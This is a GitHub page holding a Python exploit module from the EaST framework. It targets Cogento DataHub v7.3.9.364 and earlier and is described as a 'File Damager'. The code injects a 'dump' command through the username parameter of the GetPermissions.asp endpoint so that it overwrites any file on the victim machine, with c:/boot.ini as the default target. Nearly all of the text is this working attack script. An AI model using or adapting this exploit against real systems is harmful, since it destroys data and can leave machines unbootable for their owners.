Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
74 lines (62 sloc) 2.25 KB
#!/usr/bin/env python
# The exploit is a part of EaST pack - use only under the license agreement
# specified in LICENSE.txt in your EaST distribution
import sys
import time
import urllib2
sys.path.append("./core")
from Sploit import Sploit
INFO = {}
INFO['NAME'] = "ef_cogento_datahub_fd"
INFO['DESCRIPTION'] = "Cogento DataHub =< v.7.3.9.364 File Damager Exploit"
INFO['VENDOR'] = "http://www.cogentdatahub.com"
INFO["CVE Name"] = ""
INFO["NOTES"] = """
The exploit allows to damage any file at victim system by dumping data to it. Cogento DataHub v.7.3.9.364. Windows XP SP3."""
INFO['CHANGELOG'] = "07 Sep, 2015. Written by Gleg team."
INFO['PATH'] = 'Exploits/'
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "127.0.0.1"
OPTIONS["PORT"] = "80"
OPTIONS["FILENAME"] = 'c:/boot.ini'
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.port = port
self.host = host
self.filename = None
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.filename = self.args.get('FILENAME', 'c:/boot.ini')
return
def make_url(self, path = ''):
return 'http://{}:{}{}'.format(self.host, self.port, path)
def run(self):
self.args()
self.log('Try do damage file: {}'.format(self.filename))
stage1 = self.make_url('/Silverlight/GetPermissions.asp?username=nil nil)(dump {}&password=')
stage1 = stage1.format(self.filename).replace(' ', '%20')
try:
req = urllib2.urlopen(stage1).read()
self.log('Success!')
self.finish(True)
return 1
except Exception as ex:
self.log('Failed!')
print ex
self.finish(False)
return 0
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1", 80)
e.run()